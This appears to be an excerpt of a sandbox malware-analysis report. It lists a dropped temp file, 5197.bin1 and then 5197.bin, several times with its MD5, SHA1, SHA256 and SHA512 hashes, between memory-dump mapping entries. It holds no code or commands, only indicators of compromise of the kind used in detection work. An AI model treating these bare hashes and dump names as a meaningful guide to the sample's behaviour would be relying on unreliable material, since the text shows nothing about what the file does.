C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 c24e1e3d7e76a3f0190c8285a952ba2d
SHA1 20789bba0b334b28960a0810bc099fbb5af86618
SHA256 071261209821a04c5abdaace2bf6ce6a5f14e50228ab55000b4ebd05dd9f35c5
SHA512 c0b1b9757dc6310a98cdd62051e2e6d12923b3da6d56cb90ec3e832dd976b1013c5c38b0c7a3ec9b61941ef0cfdaac2c6e4f59db8e62365fd9dadeb914dbc397

memory/4216-201-0x0000000000000000-mapping.dmp

memory/2084-202-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 f2440c2ca7c021d3e23515050be042ea
SHA1 40dbec088209f383f75822fc17e5cec3c81b61b2
SHA256 e9d44a4e3e1b2ad225e086d1071b3093b4dfac858363dab3fbfba5fbbd7f575a
SHA512 980915c27cdf4ecbcd4e08946c93efefdc6e031863293761ac92abb315e7015008a0a75d713c1599d811d940354097caee5de387f7f922b7f7a03356a2a47874

memory/4272-204-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 f2440c2ca7c021d3e23515050be042ea
SHA1 40dbec088209f383f75822fc17e5cec3c81b61b2
SHA256 e9d44a4e3e1b2ad225e086d1071b3093b4dfac858363dab3fbfba5fbbd7f575a
SHA512 980915c27cdf4ecbcd4e08946c93efefdc6e031863293761ac92abb315e7015008a0a75d713c1599d811d940354097caee5de387f7f922b7f7a03356a2a47874

memory/2836-206-0x0000000000000000-mapping.dmp

memory/2564-207-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 f2eba9bd62ee1de79653a2be84b84e82
SHA1 456899ba747afa3ac16412290ea9c6192b426cfd
SHA256 82b9d18b500d26de8ed3bb1bdaba12f967fcbc0ebae7545cb1ac7c8dc76461e7
SHA512 3e6bd89f2e9e43fdcaaa1f60815c4b0f27a460d0731878b340e5f8f0ccbcdd6a69489a0cd6aeafc942ea97f20e2e9f350aab39a40cd19f1294a63340714caafe

memory/1340-209-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 f2eba9bd62ee1de79653a2be84b84e82
SHA1 456899ba747afa3ac16412290ea9c6192b426cfd
SHA256 82b9d18b500d26de8ed3bb1bdaba12f967fcbc0ebae7545cb1ac7c8dc76461e7
SHA512 3e6bd89f2e9e43fdcaaa1f60815c4b0f27a460d0731878b340e5f8f0ccbcdd6a69489a0cd6aeafc942ea97f20e2e9f350aab39a40cd19f1294a63340714caafe

memory/1748-211-0x0000000000000000-mapping.dmp

memory/1732-212-0x0000000000000000-mapping.dmp

memory/4812-213-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 2fe5b90568f0224526b668dfce8690fc
SHA1 ddf7904e71def4524be263292b4d0f7a124021f5
SHA256 f14971ceea832a3d018d95dc4d210694a2ad75248254ee9dd48eaa0ee0bb3fa0
SHA512 7b9c0ad11ed21a46ca5555690047cc97e7e88827f2b1c4171625e19852626dc3e453ea6fcacb66dd82cb8f0cf4f5ce90fe3e7023ff66a1d926564cef667e1ee6

memory/4748-215-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 2fe5b90568f0224526b668dfce8690fc
SHA1 ddf7904e71def4524be263292b4d0f7a124021f5
SHA256 f14971ceea832a3d018d95dc4d210694a2ad75248254ee9dd48eaa0ee0bb3fa0
SHA512 7b9c0ad11ed21a46ca5555690047cc97e7e88827f2b1c4171625e19852626dc3e453ea6fcacb66dd82cb8f0cf4f5ce90fe3e7023ff66a1d926564cef667e1ee6

memory/4912-217-0x0000000000000000-mapping.dmp

memory/4672-218-0x0000000000000000-mapping.dmp

memory/4768-219-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 69d4bb4fafa07be30e9d02f144dd90df
SHA1 bf7b61a62183d31c1ba7a7c2fcf9cc0f8d24d9a8
SHA256 558f6c6bacd134f0a35dd2b278ef66feeb0bec567ebb785aea225dd90f0f564e
SHA512 2d64dc657ef2c929b68f861e101aa157ef77bfcf86fa21ddc8ddaa775f578f8a136b84caa6139ba7579689530914e1f0db9ed99455e103467066ba6e6781e80c

memory/5028-221-0x0000000000000000-mapping.dmp

memory/3792-222-0x0000000000000000-mapping.dmp

memory/2188-223-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 7772ff5dc05d71f2ad07ca8f5418a126
SHA1 b2fd45c5546bfb40cf4d6904a72be5fde97b4dfa
SHA256 1d64cbce762611d8d131d1d3b8a43c9f6722b494c3c6e5b20c0d6ae403a2556c
SHA512 8f1765b862d9291a13fa130ab2f4e7d096f79fd6431a93d151a1d90f6693b7c0192370c6df9af9d9bcd66264051c548c2199478ca5697cdc7168a0c5aafdfa27

memory/856-225-0x0000000000000000-mapping.dmp

memory/956-226-0x0000000000000000-mapping.dmp

memory/4008-227-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 2c329b982cf4084062d6eb587c7520ce
SHA1 5c1dd00777651c6822a2d10825a4f2820da2d324
SHA256 2f973f40a634ad144626133bd6b6e9d9517427812e342bc2e299fe1b351e7815
SHA512 6f7fbcf5f2c776cdbea8213565ba53a417ad88a50220d34b53c588e8c6a2bca2a3eca7580bc97786e794ddc15166df1442f0704e83469f5f48562950131ba046

memory/3360-229-0x0000000000000000-mapping.dmp

memory/4384-230-0x0000000000000000-mapping.dmp

memory/2172-231-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\5197.bin1

MD5 b1978c722926e894cbf897ebf650ba88
SHA1 a9bc6f61c7f616d684cb229dd983b4e5ecb02c50
SHA256 a7013af9e2e89421d2e84b8ba38d560589473b534e1996808402c5ce63550c90
SHA512 83fbd129f82512d15d6401d883e75382ca11c53dc9caf091546d8038710738989bd096f3b288f08d1fa9c1a30f55b6db696815366e97052b285a4494f03859c9

C:\Users\Admin\AppData\Local\Temp\5197.bin

MD5 b1978c722926e894cbf897ebf650ba88
SHA1 a9bc6f61c7f616d684cb229dd983b4e5ecb02c50
SHA256 a7013af9e2e89421d2e84b8ba38d560589473b534e1996808402c5ce63550c90
SHA512 83fbd129f82512d15d6401d883e75382ca11c53dc9caf091546d8038710738989bd096f3b288f08d1fa9c1a30f55b6db696815366e97052b285a4494f03859c9